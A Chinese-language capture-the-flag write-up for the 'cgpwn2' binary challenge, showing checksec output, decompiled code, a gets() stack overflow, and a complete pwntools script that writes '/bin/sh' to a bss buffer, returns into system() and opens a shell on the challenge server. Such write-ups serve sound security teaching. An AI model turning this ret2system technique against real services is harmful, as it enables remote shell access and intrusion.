0x01寻找漏洞

checksec

kk@ubuntu:~/Desktop/black/GFSJ/cgpwn2$ checksec ./cgpwn2 
[*] '/home/kk/Desktop/black/GFSJ/cgpwn2/cgpwn2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

ida分析

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  hello();
  puts("thank you");
  return 0;
}

进入hello函数

发现gets(&s)处存在栈溢出

name在bss段中，或许可以利用fgets函数向其中进行写入点啥子⬅ 。⬅ 继续往下看
程序中调用了system函数

0x02分析利用

通过栈溢出漏洞，调用system函数，同时在name中写入"/bin/sh"，把参数地址设置为name的首地址，就可以getshell了！

0x03攻击

#!usr/bin/python
from pwn import *

io = remote("111.198.29.45",39409)
# io = process("./cgpwn2")

context.log_level = 'debug'

sys_addr = 0x08048420

io.recvuntil("your name")
io.sendline("/bin/sh")

bin_sh_addr = 0x0804A080

io.recvuntil("leave some message here:")
payload  = "a" * 0x26 + "aaaa" + p32(sys_addr) + "aaaa" + p32(bin_sh_addr)


io.sendline(payload)

io.interactive()

kk@ubuntu:~/Desktop/black/GFSJ/cgpwn2$ python exp.py 
[+] Opening connection to 111.198.29.45 on port 39409: Done
[*] Switching to interactive mode

$ ls
bin
cgpwn2
dev
flag
lib
lib32
lib64
$ cat flag
cyberpeace{自己做吧口喜口喜}
$